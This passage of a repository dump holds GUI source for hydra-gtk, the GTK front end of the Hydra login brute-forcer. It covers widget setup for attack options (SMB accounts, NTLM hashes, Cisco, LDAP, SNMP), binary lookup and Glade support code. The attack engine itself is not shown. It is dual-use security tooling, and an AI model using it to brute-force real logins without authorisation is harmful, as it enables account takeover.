gtk_widget_set_tooltip_text(chkExitF, \"Enable this to stop all attacking processes once a valid login/password pair is found (global)\");\n\n chkNoErr = gtk_check_button_new_with_mnemonic(\"Do not print messages about connection errors\");\n gtk_widget_set_name(chkNoErr, \"chkNoErr\");\n gtk_widget_show(chkNoErr);\n gtk_table_attach(GTK_TABLE(table10), chkNoErr, 0, 2, 4, 5, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_widget_set_tooltip_text(chkNoErr, \"Do not print messages about connection errors\");\n\n label30 = gtk_label_new(\"Performance Options\");\n gtk_widget_set_name(label30, \"label30\");\n gtk_widget_show(label30);\n gtk_frame_set_label_widget(GTK_FRAME(frame13), label30);\n\n label3 = gtk_label_new(\"Tuning\");\n gtk_widget_set_name(label3, \"label3\");\n gtk_widget_show(label3);\n gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 2), label3);\n\n vbox4 = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0);\n gtk_widget_set_name(vbox4, \"vbox4\");\n gtk_widget_show(vbox4);\n gtk_container_add(GTK_CONTAINER(ntbMain), vbox4);\n\n frame10 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame10, \"frame10\");\n gtk_widget_show(frame10);\n gtk_box_pack_start(GTK_BOX(vbox4), frame10, TRUE, TRUE, 0);\n\n entHTTPProxyURL = gtk_entry_new();\n gtk_widget_set_name(entHTTPProxyURL, \"entHTTPProxyURL\");\n gtk_widget_show(entHTTPProxyURL);\n gtk_container_add(GTK_CONTAINER(frame10), entHTTPProxyURL);\n gtk_widget_set_tooltip_text(entHTTPProxyURL, \"URL to connect to via the proxy\");\n gtk_entry_set_text(GTK_ENTRY(entHTTPProxyURL), \"www.suse.com\");\n\n label27 = gtk_label_new(\"http-proxy url / http-proxy-urlenum credential module\");\n gtk_widget_set_name(label27, \"label27\");\n gtk_widget_show(label27);\n gtk_frame_set_label_widget(GTK_FRAME(frame10), label27);\n\n frame3 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame3, \"frame3\");\n gtk_widget_show(frame3);\n gtk_box_pack_start(GTK_BOX(vbox4), frame3, TRUE, TRUE, 0);\n\n entHTTPURL = gtk_entry_new();\n gtk_widget_set_name(entHTTPURL, \"entHTTPURL\");\n gtk_widget_show(entHTTPURL);\n gtk_container_add(GTK_CONTAINER(frame3), entHTTPURL);\n gtk_widget_set_tooltip_text(entHTTPURL, \"The protected URL you want to access\");\n gtk_entry_set_text(GTK_ENTRY(entHTTPURL), \"/foo/bar/protected.html\");\n\n label15 = gtk_label_new(\"http / https url\");\n gtk_widget_set_name(label15, \"label15\");\n gtk_widget_show(label15);\n gtk_frame_set_label_widget(GTK_FRAME(frame3), label15);\n\n frame4 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame4, \"frame4\");\n gtk_widget_show(frame4);\n gtk_box_pack_start(GTK_BOX(vbox4), frame4, TRUE, TRUE, 0);\n\n entCiscoPass = gtk_entry_new();\n gtk_widget_set_name(entCiscoPass, \"entCiscoPass\");\n gtk_widget_show(entCiscoPass);\n gtk_container_add(GTK_CONTAINER(frame4), entCiscoPass);\n gtk_widget_set_tooltip_text(entCiscoPass, \"The password to the cisco device\");\n gtk_entry_set_text(GTK_ENTRY(entCiscoPass), \"password\");\n\n label16 = gtk_label_new(\"Cisco Enable, Login for Cisco device\");\n gtk_widget_set_name(label16, \"label16\");\n gtk_widget_show(label16);\n gtk_frame_set_label_widget(GTK_FRAME(frame4), label16);\n\n frame5 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame5, \"frame5\");\n gtk_widget_show(frame5);\n gtk_box_pack_start(GTK_BOX(vbox4), frame5, TRUE, TRUE, 0);\n\n entLDAPDN = gtk_entry_new();\n gtk_widget_set_name(entLDAPDN, \"entLDAPDN\");\n gtk_widget_show(entLDAPDN);\n gtk_container_add(GTK_CONTAINER(frame5), entLDAPDN);\n gtk_widget_set_tooltip_text(entLDAPDN, \"The DN scope of ldap to authenticate against\");\n gtk_entry_set_text(GTK_ENTRY(entLDAPDN), \"dn-scope\");\n\n label17 = gtk_label_new(\"LDAP DN\");\n gtk_widget_set_name(label17, \"label17\");\n gtk_widget_show(label17);\n gtk_frame_set_label_widget(GTK_FRAME(frame5), label17);\n\n frame6 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame6, \"frame6\");\n gtk_widget_show(frame6);\n gtk_box_pack_start(GTK_BOX(vbox4), frame6, TRUE, TRUE, 0);\n\n hbox2 = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0);\n gtk_widget_set_name(hbox2, \"hbox2\");\n gtk_widget_show(hbox2);\n gtk_container_add(GTK_CONTAINER(frame6), hbox2);\n\n chkLocal = gtk_check_button_new_with_mnemonic(\"local accounts\");\n gtk_widget_set_name(chkLocal, \"chkLocal\");\n gtk_widget_show(chkLocal);\n gtk_box_pack_start(GTK_BOX(hbox2), chkLocal, TRUE, TRUE, 0);\n gtk_widget_set_tooltip_text(chkLocal, \"Just attack local accounts (only valid for smb module)\");\n\n chkDomain = gtk_check_button_new_with_mnemonic(\"domain accounts\");\n gtk_widget_set_name(chkDomain, \"chkDomain\");\n gtk_widget_show(chkDomain);\n gtk_box_pack_start(GTK_BOX(hbox2), chkDomain, TRUE, TRUE, 0);\n gtk_widget_set_tooltip_text(chkDomain, \"Attack domain and local accounts (only valid for smb module)\");\n\n chkNTLM = gtk_check_button_new_with_mnemonic(\"Interpret passes as NTLM hashes\");\n gtk_widget_set_name(chkNTLM, \"chkNTLM\");\n gtk_widget_show(chkNTLM);\n gtk_box_pack_start(GTK_BOX(hbox2), chkNTLM, FALSE, FALSE, 0);\n gtk_widget_set_tooltip_text(chkNTLM, \"Interpret passes as NTML hashes (valid for both smb and smb2 modules)\");\n\n label18 = gtk_label_new(\"SMB\");\n gtk_widget_set_name(label18, \"label18\");\n gtk_widget_show(label18);\n gtk_frame_set_label_widget(GTK_FRAME(frame6), label18);\n\n fraSMB2 = gtk_frame_new(NULL);\n gtk_widget_set_name(fraSMB2, \"fraSMB2\");\n gtk_widget_show(fraSMB2);\n gtk_box_pack_start(GTK_BOX(vbox4), fraSMB2, TRUE, TRUE, 0);\n\n entSMB2Workgroup = gtk_entry_new();\n gtk_widget_set_name(entSMB2Workgroup, \"entSMB2Workgroup\");\n gtk_widget_show(entSMB2Workgroup);\n gtk_container_add(GTK_CONTAINER(fraSMB2), entSMB2Workgroup);\n gtk_widget_set_tooltip_text(entSMB2Workgroup, \"Workgroup to use for SMB authentication (only valid for smb2 module)\");\n gtk_entry_set_text(GTK_ENTRY(entSMB2Workgroup), \"WORKGROUP\");\n\n lblSMB2 = gtk_label_new(\"SMB2 Workgroup\");\n gtk_widget_set_name(lblSMB2, \"lblSMB2\");\n gtk_widget_show(lblSMB2);\n gtk_frame_set_label_widget(GTK_FRAME(fraSMB2), lblSMB2);\n\n frame7 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame7, \"frame7\");\n gtk_widget_show(frame7);\n gtk_box_pack_start(GTK_BOX(vbox4), frame7, TRUE, TRUE, 0);\n\n spnSAPR3_adj = gtk_adjustment_new(1, 0, 99, 1, 10, 0);\n spnSAPR3 = gtk_spin_button_new(GTK_ADJUSTMENT(spnSAPR3_adj), 1, 0);\n gtk_widget_set_name(spnSAPR3, \"spnSAPR3\");\n gtk_widget_show(spnSAPR3);\n gtk_container_add(GTK_CONTAINER(frame7), spnSAPR3);\n gtk_widget_set_tooltip_text(spnSAPR3, \"The client id you want to attack, something between 0 and 99\");\n\n label19 = gtk_label_new(\"sapr3 client id\");\n gtk_widget_set_name(label19, \"label19\");\n gtk_widget_show(label19);\n gtk_frame_set_label_widget(GTK_FRAME(frame7), label19);\n\n frame15 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame15, \"frame15\");\n gtk_widget_show(frame15);\n gtk_box_pack_start(GTK_BOX(vbox4), frame15, TRUE, TRUE, 0);\n\n entCVS = gtk_entry_new();\n gtk_widget_set_name(entCVS, \"entCVS\");\n gtk_widget_show(entCVS);\n gtk_container_add(GTK_CONTAINER(frame15), entCVS);\n gtk_widget_set_tooltip_text(entCVS, \"Directory of the CVS/SVN repository\");\n gtk_entry_set_text(GTK_ENTRY(entCVS), \"trunk\");\n\n label34 = gtk_label_new(\"CVS/SVN Repository\");\n gtk_widget_set_name(label34, \"label34\");\n gtk_widget_show(label34);\n gtk_frame_set_label_widget(GTK_FRAME(frame15), label34);\n\n frame17 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame17, \"frame17\");\n gtk_widget_show(frame17);\n gtk_box_pack_start(GTK_BOX(vbox4), frame17, TRUE, TRUE, 0);\n\n alignment1 = gtk_alignment_new(0.5, 0.5, 1, 1);\n gtk_widget_set_name(alignment1, \"alignment1\");\n gtk_widget_show(alignment1);\n gtk_container_add(GTK_CONTAINER(frame17), alignment1);\n\n entTelnet = gtk_entry_new();\n gtk_widget_set_name(entTelnet, \"entTelnet\");\n gtk_widget_show(entTelnet);\n gtk_container_add(GTK_CONTAINER(alignment1), entTelnet);\n gtk_widget_set_tooltip_text(entTelnet, \"Insert the return string for a successful login\");\n\n label36 = gtk_label_new(\"Telnet - Successful Login String\");\n gtk_widget_set_name(label36, \"label36\");\n gtk_widget_show(label36);\n gtk_frame_set_label_widget(GTK_FRAME(frame17), label36);\n gtk_label_set_use_markup(GTK_LABEL(label36), TRUE);\n\n frame16 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame16, \"frame16\");\n gtk_widget_show(frame16);\n gtk_box_pack_start(GTK_BOX(vbox4), frame16, TRUE, TRUE, 0);\n\n entSNMP = gtk_entry_new();\n gtk_widget_set_name(entSNMP, \"entSNMP\");\n gtk_widget_show(entSNMP);\n gtk_container_add(GTK_CONTAINER(frame16), entSNMP);\n gtk_widget_set_tooltip_text(entSNMP, \"SNMP options\");\n gtk_entry_set_text(GTK_ENTRY(entSNMP), \"3:SHA:AES:READ\");\n\n label35 = gtk_label_new(\"SNMP\");\n gtk_widget_set_name(label35, \"label35\");\n gtk_widget_show(label35);\n gtk_frame_set_label_widget(GTK_FRAME(frame16), label35);\n\n label14 = gtk_label_new(\"Specific\");\n gtk_widget_set_name(label14, \"label14\");\n gtk_widget_show(label14);\n gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 3), label14);\n\n vbox3 = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0);\n gtk_widget_set_name(vbox3, \"vbox3\");\n gtk_widget_show(vbox3);\n gtk_container_add(GTK_CONTAINER(ntbMain), vbox3);\n\n scrolledwindow1 = gtk_scrolled_window_new(NULL, NULL);\n gtk_widget_set_name(scrolledwindow1, \"scrolledwindow1\");\n gtk_widget_show(scrolledwindow1);\n gtk_box_pack_start(GTK_BOX(vbox3), scrolledwindow1, TRUE, TRUE, 0);\n gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW(scrolledwindow1), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);\n\n viewport1 = gtk_viewport_new(NULL, NULL);\n gtk_widget_set_name(viewport1, \"viewport1\");\n gtk_widget_show(viewport1);\n gtk_container_add(GTK_CONTAINER(scrolledwindow1), viewport1);\n\n frame14 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame14, \"frame14\");\n gtk_widget_show(frame14);\n gtk_container_add(GTK_CONTAINER(viewport1), frame14);\n\n txtOutput = gtk_text_view_new();\n gtk_widget_set_name(txtOutput, \"txtOutput\");\n gtk_widget_show(txtOutput);\n gtk_container_add(GTK_CONTAINER(frame14), txtOutput);\n gtk_text_view_set_editable(GTK_TEXT_VIEW(txtOutput), FALSE);\n\n label33 = gtk_label_new(\"Output\");\n gtk_widget_set_name(label33, \"label33\");\n gtk_widget_show(label33);\n gtk_frame_set_label_widget(GTK_FRAME(frame14), label33);\n\n hbox1 = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0);\n gtk_widget_set_name(hbox1, \"hbox1\");\n gtk_widget_show(hbox1);\n gtk_box_pack_start(GTK_BOX(vbox3), hbox1, FALSE, TRUE, 0);\n\n btnStart = gtk_button_new_with_mnemonic(\"Start\");\n gtk_widget_set_name(btnStart, \"btnStart\");\n gtk_widget_show(btnStart);\n gtk_box_pack_start(GTK_BOX(hbox1), btnStart, TRUE, FALSE, 0);\n gtk_widget_set_tooltip_text(btnStart, \"start hydra\");\n\n btnStop = gtk_button_new_with_mnemonic(\"Stop\");\n gtk_widget_set_name(btnStop, \"btnStop\");\n gtk_widget_show(btnStop);\n gtk_box_pack_start(GTK_BOX(hbox1), btnStop, TRUE, FALSE, 0);\n gtk_widget_set_tooltip_text(btnStop, \"stop hydra\");\n\n btnSave = gtk_button_new_with_mnemonic(\"Save Output\");\n gtk_widget_set_name(btnSave, \"btnSave\");\n gtk_widget_show(btnSave);\n gtk_box_pack_start(GTK_BOX(hbox1), btnSave, TRUE, FALSE, 0);\n gtk_widget_set_tooltip_text(btnSave, \"save output\");\n\n btnClear = gtk_button_new_with_mnemonic(\"Clear Output\");\n gtk_widget_set_name(btnClear, \"btnClear\");\n gtk_widget_show(btnClear);\n gtk_box_pack_start(GTK_BOX(hbox1), btnClear, TRUE, FALSE, 0);\n gtk_widget_set_tooltip_text(btnClear, \"clear screen\");\n\n label4 = gtk_label_new(\"Start\");\n gtk_widget_set_name(label4, \"label4\");\n gtk_widget_show(label4);\n gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 4), label4);\n\n statusbar = gtk_statusbar_new();\n gtk_widget_set_name(statusbar, \"statusbar\");\n gtk_widget_show(statusbar);\n gtk_box_pack_start(GTK_BOX(vbox1), statusbar, FALSE, FALSE, 0);\n\n g_signal_connect((gpointer)wndMain, \"destroy\", G_CALLBACK(on_wndMain_destroy), NULL);\n g_signal_connect((gpointer)quit1, \"activate\", G_CALLBACK(on_quit1_activate), NULL);\n g_signal_connect((gpointer)entTargetFile, \"button-press-event\", G_CALLBACK(on_entTargetFile_button_press_event), NULL);\n g_signal_connect((gpointer)entUsernameFile, \"button-press-event\", G_CALLBACK(on_entUsernameFile_button_press_event), NULL);\n g_signal_connect((gpointer)chkDisUser, \"toggled\", G_CALLBACK(on_chkDisUser_toggled), NULL);\n g_signal_connect((gpointer)entPassFile, \"button-press-event\", G_CALLBACK(on_entPassFile_button_press_event), NULL);\n g_signal_connect((gpointer)chkColon, \"toggled\", G_CALLBACK(on_chkColon_toggled), NULL);\n g_signal_connect((gpointer)entColonFile, \"button-press-event\", G_CALLBACK(on_entColonFile_button_press_event), NULL);\n g_signal_connect((gpointer)btnStart, \"clicked\", G_CALLBACK(on_btnStart_clicked), NULL);\n g_signal_connect((gpointer)btnStop, \"clicked\", G_CALLBACK(on_btnStop_clicked), NULL);\n g_signal_connect((gpointer)btnSave, \"clicked\", G_CALLBACK(on_btnSave_clicked), NULL);\n g_signal_connect((gpointer)btnClear, \"clicked\", G_CALLBACK(on_btnClear_clicked), NULL);\n\n /* Store pointers to all widgets, for use by lookup_widget(). */\n GLADE_HOOKUP_OBJECT_NO_REF(wndMain, wndMain, \"wndMain\");\n GLADE_HOOKUP_OBJECT(wndMain, vbox1, \"vbox1\");\n GLADE_HOOKUP_OBJECT(wndMain, menubar1, \"menubar1\");\n GLADE_HOOKUP_OBJECT(wndMain, quit1, \"quit1\");\n GLADE_HOOKUP_OBJECT(wndMain, ntbMain, \"ntbMain\");\n GLADE_HOOKUP_OBJECT(wndMain, vbox5, \"vbox5\");\n GLADE_HOOKUP_OBJECT(wndMain, frame11, \"frame11\");\n GLADE_HOOKUP_OBJECT(wndMain, table8, \"table8\");\n GLADE_HOOKUP_OBJECT(wndMain, cmbProtocol, \"cmbProtocol\");\n GLADE_HOOKUP_OBJECT(wndMain, entProtocol, \"entProtocol\");\n GLADE_HOOKUP_OBJECT(wndMain, label7, \"label7\");\n GLADE_HOOKUP_OBJECT(wndMain, spnPort, \"spnPort\");\n GLADE_HOOKUP_OBJECT(wndMain, label6, \"label6\");\n GLADE_HOOKUP_OBJECT(wndMain, radioTarget2, \"radioTarget2\");\n GLADE_HOOKUP_OBJECT(wndMain, entTargetFile, \"entTargetFile\");\n GLADE_HOOKUP_OBJECT(wndMain, entTarget, \"entTarget\");\n GLADE_HOOKUP_OBJECT(wndMain, radioTarget1, \"radioTarget1\");\n GLADE_HOOKUP_OBJECT(wndMain, label28, \"label28\");\n GLADE_HOOKUP_OBJECT(wndMain, frame12, \"frame12\");\n GLADE_HOOKUP_OBJECT(wndMain, table9, \"table9\");\n GLADE_HOOKUP_OBJECT(wndMain, chkVerbose, \"chkVerbose\");\n GLADE_HOOKUP_OBJECT(wndMain, chkDebug, \"chkDebug\");\n GLADE_HOOKUP_OBJECT(wndMain, chkAttempts, \"chkAttempts\");\n GLADE_HOOKUP_OBJECT(wndMain, chkIPV6, \"chkIPV6\");\n GLADE_HOOKUP_OBJECT(wndMain, chkSSL, \"chkSSL\");\n GLADE_HOOKUP_OBJECT(wndMain, chkServiceDetails, \"chkServiceDetails\");\n GLADE_HOOKUP_OBJECT(wndMain, chkCompleteHelp, \"chkCompleteHelp\");\n GLADE_HOOKUP_OBJECT(wndMain, chkOldSSL, \"chkOldSSL\");\n GLADE_HOOKUP_OBJECT(wndMain, label29, \"label29\");\n GLADE_HOOKUP_OBJECT(wndMain, label1, \"label1\");\n GLADE_HOOKUP_OBJECT(wndMain, vbox2, \"vbox2\");\n GLADE_HOOKUP_OBJECT(wndMain, frmUsername, \"frmUsername\");\n GLADE_HOOKUP_OBJECT(wndMain, table2, \"table2\");\n GLADE_HOOKUP_OBJECT(wndMain, entUsernameFile, \"entUsernameFile\");\n GLADE_HOOKUP_OBJECT(wndMain, entUsername, \"entUsername\");\n GLADE_HOOKUP_OBJECT(wndMain, radioUsername1, \"radioUsername1\");\n GLADE_HOOKUP_OBJECT(wndMain, chkUsernameLoop, \"chkUsernameLoop\");\n GLADE_HOOKUP_OBJECT(wndMain, radioUsername2, \"radioUsername2\");\n GLADE_HOOKUP_OBJECT(wndMain, chkDisUser, \"chkDisUser\");\n GLADE_HOOKUP_OBJECT(wndMain, label8, \"label8\");\n GLADE_HOOKUP_OBJECT(wndMain, frmPass, \"frmPass\");\n GLADE_HOOKUP_OBJECT(wndMain, table3, \"table3\");\n GLADE_HOOKUP_OBJECT(wndMain, entPassFile, \"entPassFile\");\n GLADE_HOOKUP_OBJECT(wndMain, entPass, \"entPass\");\n GLADE_HOOKUP_OBJECT(wndMain, radioPass1, \"radioPass1\");\n GLADE_HOOKUP_OBJECT(wndMain, radioPass2, \"radioPass2\");\n GLADE_HOOKUP_OBJECT(wndMain, radioGenerate, \"radioGenerate\");\n GLADE_HOOKUP_OBJECT(wndMain, entGeneration, \"entGeneration\");\n GLADE_HOOKUP_OBJECT(wndMain, labelpass, \"labelpass\");\n GLADE_HOOKUP_OBJECT(wndMain, frame8, \"frame8\");\n GLADE_HOOKUP_OBJECT(wndMain, table5, \"table5\");\n GLADE_HOOKUP_OBJECT(wndMain, chkColon, \"chkColon\");\n GLADE_HOOKUP_OBJECT(wndMain, entColonFile, \"entColonFile\");\n GLADE_HOOKUP_OBJECT(wndMain, label20, \"label20\");\n GLADE_HOOKUP_OBJECT(wndMain, table6, \"table6\");\n GLADE_HOOKUP_OBJECT(wndMain, chkPassLogin, \"chkPassLogin\");\n GLADE_HOOKUP_OBJECT(wndMain, chkPassNull, \"chkPassNull\");\n GLADE_HOOKUP_OBJECT(wndMain, chkPassReverse, \"chkPassReverse\");\n GLADE_HOOKUP_OBJECT(wndMain, label2, \"label2\");\n GLADE_HOOKUP_OBJECT(wndMain, table4, \"table4\");\n GLADE_HOOKUP_OBJECT(wndMain, frame9, \"frame9\");\n GLADE_HOOKUP_OBJECT(wndMain, table7, \"table7\");\n GLADE_HOOKUP_OBJECT(wndMain, label22, \"label22\");\n GLADE_HOOKUP_OBJECT(wndMain, entHTTPProxy, \"entHTTPProxy\");\n GLADE_HOOKUP_OBJECT(wndMain, chkProxyAuth, \"chkProxyAuth\");\n GLADE_HOOKUP_OBJECT(wndMain, label23, \"label23\");\n GLADE_HOOKUP_OBJECT(wndMain, entProxyUser, \"entProxyUser\");\n GLADE_HOOKUP_OBJECT(wndMain, label24, \"label24\");\n GLADE_HOOKUP_OBJECT(wndMain, entProxyPass, \"entProxyPass\");\n GLADE_HOOKUP_OBJECT(wndMain, label26, \"label26\");\n GLADE_HOOKUP_OBJECT(wndMain, hbox3, \"hbox3\");\n GLADE_HOOKUP_OBJECT(wndMain, radioProxy, \"radioProxy\");\n GLADE_HOOKUP_OBJECT(wndMain, radioProxy2, \"radioProxy2\");\n GLADE_HOOKUP_OBJECT(wndMain, radioProxy3, \"radioProxy3\");\n GLADE_HOOKUP_OBJECT(wndMain, label21, \"label21\");\n GLADE_HOOKUP_OBJECT(wndMain, frame13, \"frame13\");\n GLADE_HOOKUP_OBJECT(wndMain, table10, \"table10\");\n GLADE_HOOKUP_OBJECT(wndMain, chkExitf, \"chkExitf\");\n GLADE_HOOKUP_OBJECT(wndMain, spnTimeout, \"spnTimeout\");\n GLADE_HOOKUP_OBJECT(wndMain, spnTasks, \"spnTasks\");\n GLADE_HOOKUP_OBJECT(wndMain, label32, \"label32\");\n GLADE_HOOKUP_OBJECT(wndMain, label31, \"label31\");\n GLADE_HOOKUP_OBJECT(wndMain, chkExitF, \"chkExitF\");\n GLADE_HOOKUP_OBJECT(wndMain, chkNoErr, \"chkNoErr\");\n GLADE_HOOKUP_OBJECT(wndMain, label30, \"label30\");\n GLADE_HOOKUP_OBJECT(wndMain, label3, \"label3\");\n GLADE_HOOKUP_OBJECT(wndMain, vbox4, \"vbox4\");\n GLADE_HOOKUP_OBJECT(wndMain, frame10, \"frame10\");\n GLADE_HOOKUP_OBJECT(wndMain, entHTTPProxyURL, \"entHTTPProxyURL\");\n GLADE_HOOKUP_OBJECT(wndMain, label27, \"label27\");\n GLADE_HOOKUP_OBJECT(wndMain, frame3, \"frame3\");\n GLADE_HOOKUP_OBJECT(wndMain, entHTTPURL, \"entHTTPURL\");\n GLADE_HOOKUP_OBJECT(wndMain, label15, \"label15\");\n GLADE_HOOKUP_OBJECT(wndMain, frame4, \"frame4\");\n GLADE_HOOKUP_OBJECT(wndMain, entCiscoPass, \"entCiscoPass\");\n GLADE_HOOKUP_OBJECT(wndMain, label16, \"label16\");\n GLADE_HOOKUP_OBJECT(wndMain, frame5, \"frame5\");\n GLADE_HOOKUP_OBJECT(wndMain, entLDAPDN, \"entLDAPDN\");\n GLADE_HOOKUP_OBJECT(wndMain, label17, \"label17\");\n GLADE_HOOKUP_OBJECT(wndMain, frame6, \"frame6\");\n GLADE_HOOKUP_OBJECT(wndMain, hbox2, \"hbox2\");\n GLADE_HOOKUP_OBJECT(wndMain, chkLocal, \"chkLocal\");\n GLADE_HOOKUP_OBJECT(wndMain, chkDomain, \"chkDomain\");\n GLADE_HOOKUP_OBJECT(wndMain, chkNTLM, \"chkNTLM\");\n GLADE_HOOKUP_OBJECT(wndMain, label18, \"label18\");\n GLADE_HOOKUP_OBJECT(wndMain, frame7, \"frame7\");\n GLADE_HOOKUP_OBJECT(wndMain, spnSAPR3, \"spnSAPR3\");\n GLADE_HOOKUP_OBJECT(wndMain, label19, \"label19\");\n GLADE_HOOKUP_OBJECT(wndMain, frame15, \"frame15\");\n GLADE_HOOKUP_OBJECT(wndMain, entCVS, \"entCVS\");\n GLADE_HOOKUP_OBJECT(wndMain, label34, \"label34\");\n GLADE_HOOKUP_OBJECT(wndMain, frame17, \"frame17\");\n GLADE_HOOKUP_OBJECT(wndMain, alignment1, \"alignment1\");\n GLADE_HOOKUP_OBJECT(wndMain, entTelnet, \"entTelnet\");\n GLADE_HOOKUP_OBJECT(wndMain, label36, \"label36\");\n GLADE_HOOKUP_OBJECT(wndMain, frame16, \"frame16\");\n GLADE_HOOKUP_OBJECT(wndMain, entSNMP, \"entSNMP\");\n GLADE_HOOKUP_OBJECT(wndMain, label35, \"label35\");\n GLADE_HOOKUP_OBJECT(wndMain, label14, \"label14\");\n GLADE_HOOKUP_OBJECT(wndMain, vbox3, \"vbox3\");\n GLADE_HOOKUP_OBJECT(wndMain, scrolledwindow1, \"scrolledwindow1\");\n GLADE_HOOKUP_OBJECT(wndMain, viewport1, \"viewport1\");\n GLADE_HOOKUP_OBJECT(wndMain, frame14, \"frame14\");\n GLADE_HOOKUP_OBJECT(wndMain, txtOutput, \"txtOutput\");\n GLADE_HOOKUP_OBJECT(wndMain, label33, \"label33\");\n GLADE_HOOKUP_OBJECT(wndMain, hbox1, \"hbox1\");\n GLADE_HOOKUP_OBJECT(wndMain, btnStart, \"btnStart\");\n GLADE_HOOKUP_OBJECT(wndMain, btnStop, \"btnStop\");\n GLADE_HOOKUP_OBJECT(wndMain, btnSave, \"btnSave\");\n GLADE_HOOKUP_OBJECT(wndMain, btnClear, \"btnClear\");\n GLADE_HOOKUP_OBJECT(wndMain, label4, \"label4\");\n GLADE_HOOKUP_OBJECT(wndMain, statusbar, \"statusbar\");\n GLADE_HOOKUP_OBJECT(wndMain, entSMB2Workgroup, \"entSMB2Workgroup\");\n\n gtk_window_add_accel_group(GTK_WINDOW(wndMain), accel_group);\n\n return wndMain;\n}\n" }, { "path": "hydra-gtk/src/interface.h", "content": "\n/*\n * DO NOT EDIT THIS FILE - it is generated by Glade.\n */\n\nGtkWidget *create_wndMain(void);\n" }, { "path": "hydra-gtk/src/main.c", "content": "\n/*\n * Initial main.c file generated by Glade. Edit as required.\n * Glade will not overwrite this file.\n */\n\n#ifdef HAVE_CONFIG_H\n#include \n#endif\n\n#include \"callbacks.h\"\n#include \"interface.h\"\n#include \"support.h\"\n#include \n#include \n\nchar *hydra_path1 = \"./hydra\";\nchar *hydra_path2 = \"/usr/local/bin/hydra\";\nchar *hydra_path3 = \"/usr/bin/hydra\";\nchar *hydra_path4 = \"/data/data/com.termux/files/usr/bin/hydra\";\nchar *hydra_path5 = \"/data/data/com.termux/files/usr/local/bin/hydra\";\n\nGtkWidget *wndMain;\nchar *HYDRA_BIN;\nguint message_id;\n\nint main(int argc, char *argv[]) {\n int i;\n extern guint message_id;\n GtkWidget *output;\n GtkTextBuffer *outputbuf;\n\n gtk_init(&argc, &argv);\n\n add_pixmap_directory(PACKAGE_DATA_DIR \"/\" PACKAGE \"/pixmaps\");\n\n /* initialize the message id */\n message_id = 0;\n\n /* locate the hydra binary */\n HYDRA_BIN = NULL;\n for (i = 0; i < argc - 1; i++) {\n if (!strcmp(argv[i], \"--hydra-path\")) {\n HYDRA_BIN = argv[i + 1];\n break;\n }\n }\n\n if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) {\n /* just for obfuscation *g* */\n } else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) {\n HYDRA_BIN = hydra_path1;\n } else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) {\n HYDRA_BIN = hydra_path2;\n } else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) {\n HYDRA_BIN = hydra_path3;\n } else if (g_file_test(hydra_path4, G_FILE_TEST_IS_EXECUTABLE)) {\n HYDRA_BIN = hydra_path4;\n } else if (g_file_test(hydra_path5, G_FILE_TEST_IS_EXECUTABLE)) {\n HYDRA_BIN = hydra_path5;\n } else {\n g_error(\"Please tell me where hydra is, use --hydra-path\\n\");\n return -1;\n }\n\n /* create window and show it */\n wndMain = create_wndMain();\n gtk_widget_show(wndMain);\n\n /* if we can't use the new cool file chooser, the save button gets disabled */\n#ifndef GTK_TYPE_FILE_CHOOSER\n GtkWidget *btnSave;\n\n btnSave = lookup_widget(GTK_WIDGET(wndMain), \"btnSave\");\n gtk_widget_set_sensitive(btnSave, FALSE);\n#endif\n\n /* update the statusbar every now and then */\n g_timeout_add(600, update_statusbar, NULL);\n\n /* we want bold text in the output window */\n output = lookup_widget(GTK_WIDGET(wndMain), \"txtOutput\");\n outputbuf = gtk_text_view_get_buffer((GtkTextView *)output);\n gtk_text_buffer_create_tag(outputbuf, \"bold\", \"weight\", PANGO_WEIGHT_BOLD, NULL);\n\n /* he ho, lets go! */\n gtk_main();\n return 0;\n}\n" }, { "path": "hydra-gtk/src/support.c", "content": "\n/*\n * DO NOT EDIT THIS FILE - it is generated by Glade.\n */\n\n#ifdef HAVE_CONFIG_H\n#include \n#endif\n\n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"support.h\"\n\nGtkWidget *lookup_widget(GtkWidget *widget, const gchar *widget_name) {\n GtkWidget *parent, *found_widget;\n\n for (;;) {\n if (GTK_IS_MENU(widget))\n parent = gtk_menu_get_attach_widget(GTK_MENU(widget));\n else\n parent = gtk_widget_get_parent(widget);\n if (parent == NULL)\n break;\n widget = parent;\n }\n\n found_widget = (GtkWidget *)g_object_get_data(G_OBJECT(widget), widget_name);\n if (!found_widget)\n g_warning(\"Widget not found: %s\", widget_name);\n return found_widget;\n}\n\nstatic GList *pixmaps_directories = NULL;\n\n/* Use this function to set the directory containing installed pixmaps. */\nvoid add_pixmap_directory(const gchar *directory) { pixmaps_directories = g_list_prepend(pixmaps_directories, g_strdup(directory)); }\n\n/* This is an internally used function to find pixmap files. */\nstatic gchar *find_pixmap_file(const gchar *filename) {\n GList *elem;\n\n /* We step through each of the pixmaps directory to find it. */\n elem = pixmaps_directories;\n while (elem) {\n gchar *pathname = 